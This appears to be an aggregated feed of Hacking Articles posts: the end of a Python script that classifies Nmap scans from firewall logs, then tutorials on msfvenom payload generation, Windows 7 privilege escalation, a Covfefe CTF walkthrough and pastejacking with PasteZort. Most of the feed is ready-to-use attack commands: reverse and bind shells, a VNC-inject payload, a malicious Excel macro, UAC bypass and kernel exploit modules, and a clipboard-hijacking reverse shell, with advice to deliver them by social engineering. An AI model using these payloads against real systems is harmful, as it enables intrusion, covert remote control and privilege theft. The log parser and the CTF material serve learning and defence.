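    "Nov 23 21:10:04 ubuntu kernel: kaliNmapIN=eth0 OUT= SRC=192.168.0.107 DST=192.168.0.101 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=4 PROTO=TCP SPT=40004 DPT=22 WINDOW=1024 RES=0x00 URGP=0",
    "Nov 23 21:10:05 ubuntu kernel: kaliNmapIN=eth0 OUT= SRC=192.168.0.107 DST=192.168.0.101 LEN=40 TOS=0x00 PREC=0x00 TTL=45 ID=5 PROTO=TCP SPT=40005 DPT=22 WINDOW=1024 RES=0x00 FIN PSH URG URGP=0",
    "Nov 23 21:10:06 ubuntu kernel: kaliNmapIN=eth0 OUT= SRC=216.58.203.164 DST=192.168.0.101 LEN=44 TOS=0x00 PREC=0x00 TTL=39 ID=6 PROTO=TCP SPT=40006 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0",
]


def parse_log_line(line):
    """Return the fields of one kaliNmap TCP log line, or None if the line is
    not one. Flags are the bare tokens; 'URGP=0' and 'DF' are not flags."""
    if "kaliNmap" not in line:
        return None
    fields = dict(re.findall(r"\b([A-Z]+)=(\S*)", line))
    if fields.get("PROTO") != "TCP":
        return None
    flags = {tok for tok in line.split() if tok in TCP_FLAGS}
    return {"src": fields["SRC"], "dst": fields["DST"], "dport": int(fields["DPT"]),
            "len": int(fields["LEN"]), "ttl": int(fields["TTL"]), "flags": flags}


def classify(probe):
    """Map a probe to the scan type from the article's table. LEN is the IP total
    length, which is what the table calls data length."""
    f, length, ttl = probe["flags"], probe["len"], probe["ttl"]
    if f == {"SYN"} and length == 60 and ttl == 64:
        return "-sT connect"
    if f == {"SYN"}:
        return "-sS half-open"
    if f == {"FIN"}:
        return "-sF FIN"
    if not f:
        return "-sN NULL"
    if f == {"FIN", "PSH", "URG"}:
        return "-sX Xmas"
    return "other"


def summarize(lines):
    """Count scan types per source IP. Several sources hitting the same port in
    the same second is what a -D decoy scan looks like, so the IP alone is not
    enough to attribute the scan."""
    per_src = defaultdict(Counter)
    for line in lines:
        probe = parse_log_line(line)
        if probe:
            per_src[probe["src"]][classify(probe)] += 1
    return {src: dict(counts) for src, counts in per_src.items()}


if __name__ == "__main__":
    for src, counts in summarize(SAMPLE_LOG).items():
        print(src, counts)
```

Feed it the real file with `summarize(open("/var/log/syslog"))`; lines without the kaliNmap prefix are skipped.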

The post Understanding Guide to Nmap Firewall Scan (Part 1) appeared first on Hacking Articles.


Msfvenom Tutorials for Beginners

Fri, 17/Nov/2017 - 16:02

Hello friends!!

Today we will learn to create payloads with a popular tool from Metasploit, and explore the various options available in the tool to create payloads with different extensions and techniques.

Msfvenom

Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

Requirements:

  • Kali Linux
  • Windows Machine
  • Android Phone
  • Linux Machine

Abbreviations:

lhost = (IP of Kali)

lport = (any port you wish to assign to the listener)

-p = payload (i.e. Windows, Android, PHP etc.)

-f = file format (i.e. Windows = exe, Android = apk etc.)

Let’s Begin!!

From the Kali terminal type the command msfvenom as shown below. It will show you all the options available for creating a payload, but in this article we are talking about the different types of payload we can generate.

Bind shell

A bind shell is the kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session.

Now type the command below on your Kali terminal:

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the “exe” payload file on your desktop, as specified in the command (/root/Desktop/bind.exe). We need to send this file to the victim machine through a file share or by some social engineering technique and have it run on the system.

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/bind_tcp

msf exploit(handler) > set rhost 192.168.0.100

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Once the file is executed on the machine we get the victim machine’s meterpreter session, as shown below:

The bind_tcp option is helpful in case we get disconnected from the victim machine while the payload is still running: we can execute the same command and get the session back without the victim having to run the file again.

Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

From the Kali terminal type the msfvenom command as shown below:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > /root/Desktop/reverse_tcp.exe

In this case we include a few other options, lhost (local host) and lport (local port), to get a reverse connection from the victim machine.

Once the payload is generated and sent to the victim for execution, we start our next step as shown below.

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

We can confirm from the image below that once the payload is executed by the victim we receive a reverse connection and get the meterpreter session successfully.

HTTPS Payload

Note: both of the above payloads can be used when the relevant ports are reachable on the victim machine, so the question arises: what if the victim has blocked all other ports?

Well, in such cases we can create payloads for the ports that are in use on the victim machine, such as 443 for HTTPS.

Let us take this case and create a payload with HTTPS. From the Kali terminal type the msfvenom command as shown below:

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and sent to the victim for execution, we start our next step as shown below.

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_https

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

We can confirm from the image above that once the payload is executed by the victim we receive a reverse connection and get the meterpreter session.

Hidden Bind TCP Payload

Let us now explore some other techniques available in the msfvenom tool and try to exploit the victim machine; this time we will get a shell on the victim machine instead of a meterpreter session.

Let’s begin!!

This payload runs silently in the background once executed and does not reveal its presence when probed by a port scanner.

From the Kali terminal type the msfvenom command as shown below:

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

Once the payload is generated and sent to the victim for execution, we start our next step as shown below.

We use netcat to connect to the hidden bind shell.

Now from the Kali terminal type the command shown below:

nc 192.168.0.100 1010

Reverse Shell Payload with Netcat

Let us now do the same with the shell_reverse_tcp payload, one more technique to get a shell session on the victim.

From the Kali terminal type the msfvenom command as shown below:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=1111 -f exe > /root/Desktop/ncshell.exe

Once the payload is generated and sent to the victim for execution, we start our next step as shown below.

We set up our listener using netcat; the image below confirms the shell session captured by the Kali machine.

Now from the Kali terminal type the command shown below.

nc -lvp 1111

Macro Payload

Let us now create a payload as a VBA script, which we will use to create a macro in Excel to exploit the victim machine.

Let us begin to create the payload!!

Open the Kali terminal and type the command mentioned below:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

Once the command is executed, copy the script starting from “#If Vba7” up to “End If”, as highlighted in the image below:

Now open an Excel file and press Alt+F11 to open the VBA editor; you will get the option box shown above. Enter the name you would like to give it and click “Create”.

You will get a new option box as above; click on “This Workbook”, replace its contents with the VBA script payload generated by msfvenom, close the VBA editor and enable the macro.

Now you may fill the Excel file with data that looks realistic enough for a victim to open it; in our case we have just inserted the value “Test”. Save the file and send it to the victim.

To capture the sessions let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 7777

msf exploit(handler) > exploit

Once the Excel file is opened by the victim it prompts the victim to enable the macro; once enabled, our VBA script executes and gives us a reverse connection to the victim machine, as shown in the image below.

VNC Payload

Would it not be great if we could take remote control of the victim machine without their knowledge and observe their activity? This payload does exactly that, so let us use it to our benefit.

Let us begin to create the payload!! Open a Kali terminal and type the command mentioned below:

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

Once the payload is generated and sent to the victim for execution, we move on to the next step. To capture the session, let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 5900

msf exploit(handler) > exploit

We can see that the reverse connection has executed the VNC injection and a session to the victim's machine is established on our Kali machine, showing its remote desktop.

Android Payload

Exploiting handheld devices has always been a hot topic and still is, hence we have included it in our article as well. Let us use one of the Android payloads available within msfvenom to our benefit.

Let’s begin

Open a Kali terminal and type the command mentioned below:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

Once the payload is generated, send it to the victim to execute on the handheld and start the multi handler as shown in the image below.

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 8888

msf exploit(handler) > exploit

Once the payload is executed, you get a Meterpreter session on the handheld, which is now under your control as shown below.

Linux Payload

Open a Kali terminal and type the command mentioned below:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell

Once the payload is generated, send it to the victim to execute on the Linux machine and start the multi handler as shown in the image below.

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Once the payload is executed, it creates a reverse TCP connection to our Kali machine and provides us with a Meterpreter session, as shown in the image below.

Powershell Payload

Open a Kali terminal and type the command mentioned below:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

Once the payload is generated, send it to the victim to execute on the Windows machine and start the multi handler as shown in the image below.

msf > use multi/handler

msf exploit(handler) > set payload cmd/windows/reverse_powershell

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Once the payload is executed, it creates a reverse connection and gives us a shell, as shown in the image below.

Author: Krishnan Sharma is a technology professional with a passion for information security and related fields. He loves technical writing and is part of our Hacking Articles team; he may be contacted Here

The post Msfvenom Tutorials for Beginners appeared first on Hacking Articles.

Categories: Cyber India

7 Ways to Privilege Escalation of Windows 7 PC

Wed, 15/Nov/2017 - 21:01

When you exploit the victim PC there are certain limits that prevent some actions even after you have a shell on the victim’s PC. To get complete access to the victim PC you need privilege escalation, in which a user receives privileges they are not authorized to have. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various post-exploitation modules that use a number of different techniques to attempt to gain system-level privileges on the remote system.

Requirement

Attacker: kali Linux

Victim PC: Windows 7 

Open a Kali Linux terminal and type msfconsole

Use a Windows payload and start multi/handler for the reverse connection. Once you have a session on the victim PC, go for privilege escalation using the following techniques.

Windows Escalate UAC Protection Bypass

Available targets: Windows 32-bit and Windows 64-bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

Take a look at the image: the getuid command shows the current user ID, that is the username pc 10; after using getsystem the username is SYSTEM. Use getuid again and you now have admin access.

Windows Escalate UAC Protection Bypass (In Memory Injection)

Available targets: Windows 32-bit and Windows 64-bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three separate binaries of the standard technique. However, it requires the correct architecture to be selected (use x64 for SYSWOW64 systems as well). If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(bypassuac_injection) > set session 1

msf exploit(bypassuac_injection) > exploit

Use the getsystem command and then check the user ID by typing getuid in Meterpreter.

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

Available targets: Windows 32-bit and Windows 64-bit

This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

msf > use windows/local/bypassuac_vbs

msf exploit(bypassuac_vbs) > set session 1

msf exploit(bypassuac_vbs) > exploit

Use the getsystem command and then check the user ID by typing getuid in Meterpreter.

Windows Escalate UAC Execute RunAs

Available targets: Windows 32-bit and Windows 64-bit

This module will attempt to elevate the execution level using the undocumented RunAs flag of ShellExecute to bypass low UAC settings. The ask module always uses a self-generated payload, which is easily detected by AV. The user must click Yes to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask

msf exploit(ask) > set session 1

msf exploit(ask) > exploit

Use the getsystem command and then check the user ID by typing getuid in Meterpreter.

MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: Windows 32-bit and Windows 64-bit

This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect Windows 7 through 10 and Server 2008 through 2012, 32- and 64-bit. This module will only work against those versions of Windows with PowerShell 2.0 or later and on systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc

msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1

msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

Use the getsystem command and then check the user ID by typing getuid in Meterpreter.

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Available targets: Windows 32-bit

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) > set session 1

msf exploit(ms16_016_webdav) > exploit

Use the getsystem command in Meterpreter for admin access to the PC.

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

Available targets: Windows 7 32-bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL of the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in Pwn2Own 2013 by MWR to break out of Chrome’s sandbox. NOTE: when a Meterpreter session started by this exploit exits, winlogon.exe is likely to crash.

msf exploit(ms13_053_schlamperei) > set session 1

msf exploit(ms13_053_schlamperei) > exploit

Use the getsystem command and then check the user ID by typing getuid in Meterpreter.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadgets lover. Contact here

The post 7 Ways to Privilege Escalation of Windows 7 PC appeared first on Hacking Articles.

Categories: Cyber India

Hack the Covfefe VM (CTF Challenge)

Wed, 15/Nov/2017 - 14:10

Hello friends! Today we are going to take on another CTF challenge known as Covfefe. The credit for making this VM goes to “Tim Kent”, and it is another capture-the-flag challenge in which our goal is to find 3 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.1.120, but you will have to find your own).

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.120

The nmap scan shows us that port 31337 is running HTTP, so we open the IP address on port 31337 in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.120:31337

We open robots.txt and find a directory called /taxes.

When we open /taxes directory we find our 1st flag.

Our dirb scan also showed us a few directories. Inside the /.ssh directory we find an SSH private key and an authorized_keys file.

We download the private key and authorized_keys to our system for further enumeration.

Now we open authorized_keys to find the username that goes with the private key. We find it to be Simon.

Now we use the private key to connect to the VM through ssh.

chmod 600 id_rsa

ssh -i id_rsa simon@192.168.1.120

When we try to connect, it asks for the passphrase of the RSA key, so we use John the Ripper to crack it with rockyou.txt as our dictionary.

ssh2john id_rsa > rsacrack

zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack

We find that passphrase of the key is starwars. Now we use this passphrase along with the key to connect through ssh.

Now, going through the files, we search for SUID binaries, i.e. binaries that run with the permissions of their owner (root).

find / -perm -4000 2>/dev/null

When we run read_message we find it is a program that takes user input and displays a message.

When we enter the /root/ folder we find the source code of the read_message program. Inside the source code we find the second flag.

Reading through the source code we find that, when we enter a string, it checks whether the first 5 characters of the string are “Simon”. If they match, it runs the program /usr/local/sbin/message. The input buffer is allocated 20 bytes, so we overflow the stack by entering more than 20 bytes of data: the first 5 characters are ‘Simon’, followed by 15 ‘A’s, and then ‘/bin/sh’ starting at the 21st byte.

As soon as we enter the string we spawn a shell as root, and now we can access flag.txt. When we open flag.txt we find our 3rd flag.
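The overflow just described, as an added example that is not the VM’s own source: a constructed C model of the 20-byte input buffer lying directly before the program path, beside a hardened version that bounds the copy, rejects over-long input and keeps the path out of the frame entirely. The struct layout and function names are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the frame the write-up describes: a 20-byte
 * input buffer directly followed by the path that gets executed.
 * Not the VM's real source, only the layout the post explains. */
struct frame {
    char input[20];
    char program[24];   /* "/usr/local/sbin/message" + NUL */
};

static void frame_init(struct frame *f)
{
    memset(f, 0, sizeof *f);
    strcpy(f->program, "/usr/local/sbin/message");
}

/* Vulnerable form: the line is copied with no length check, so input
 * bytes 21 onward land in 'program'. Returns 1 if the first 5 bytes
 * equal "Simon", which is the only check the program performs. */
static int read_message_vulnerable(struct frame *f, const char *line)
{
    memcpy((char *)f, line, strlen(line) + 1);   /* unbounded copy */
    return strncmp(f->input, "Simon", 5) == 0;
}

/* Hardened form: the copy is bounded by sizeof input, an over-long
 * line is refused rather than silently truncated, and the program
 * path is a constant that never sits next to attacker-controlled
 * bytes. Returns the path to run, or NULL to run nothing. */
static const char *const MESSAGE_PROGRAM = "/usr/local/sbin/message";

static const char *read_message_hardened(struct frame *f, const char *line)
{
    int n = snprintf(f->input, sizeof f->input, "%s", line);
    if (n < 0 || n >= (int)sizeof f->input)
        return NULL;                              /* too long: refuse */
    if (strncmp(f->input, "Simon", 5) != 0)
        return NULL;                              /* wrong name */
    return MESSAGE_PROGRAM;
}

int main(void)
{
    struct frame f;
    const char *overlong = "SimonAAAAAAAAAAAAAAA/bin/sh";   /* 20 + 7 bytes */
    frame_init(&f);
    read_message_vulnerable(&f, overlong);
    printf("vulnerable: program is now %s\n", f.program);  /* /bin/sh */
    frame_init(&f);
    printf("hardened: %s, program still %s\n",
           read_message_hardened(&f, overlong) ? "ran" : "refused", f.program);
    return 0;
}
```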

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Hack the Covfefe VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Exploiting Remote machine with Pastejacking

Tue, 14/Nov/2017 - 10:17

Pastejacking is a technique that takes over the clipboard of a machine: for instance, when we copy text from a website, that text can be riddled with malicious code that executes when it is pasted. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is copy some harmless-looking words from the browser and paste them into the command prompt, and that’s it, session!!

We are going to walk you through the process, using a tool called PasteZort

Here’s how it happens:

The first thing you’ll need to do is get the tool from Github.

To keep it simple, from your Kali terminal navigate to the desktop using “cd Desktop”. Once you’re at “root@kali:~/Desktop#”, type “git clone https://github.com/Zetahack/PasteZort.git”. This will make a PasteZort folder on your desktop with the tool in it.

Open the folder and you will see all the files you need to run this tool, the inside of the folder will look like the screenshot given below.

In order to execute the tool we first must change the permission of the “encode.rb” file. Right click on the “encode.rb” file and open its properties, under properties, go to the “Permissions” tab, check the box in front of “Execute” that says “Allow executing file as program”.

Navigate to the PasteZort folder from the Kali terminal and execute the tool using “python ./PasteZort.py”. Your tool is now running.

Now we can get started making our pastejacking payload using the tool's interface. We will be making a Windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.

After that, again choose option “1” under “Select Payload” to generate a Windows reverse TCP shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT”.

You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “http://www.hackingarticles.in”.

And that’s it, your payload is ready.

You will now be asked if you would like to turn on the Handler; type “Y” and press Enter.

Open a web browser on the victim machine and enter your IP in the address bar, the text you typed in the message section will appear, select the text and copy it.

Open command prompt on the victim machine, paste the copied text and press Enter.

Go back to the Kali terminal and you will see Handler starting the reverse tcp and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.

The beauty of this tool lies in its simplicity: it has a clean interface with an intuitive workflow and gets effective results without any mess. The message section makes it easy to make your payload look as harmless as possible. This also goes to show how easy it is to get hacked, so stay vigilant.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Exploiting Remote machine with Pastejacking appeared first on Hacking Articles.

Categories: Cyber India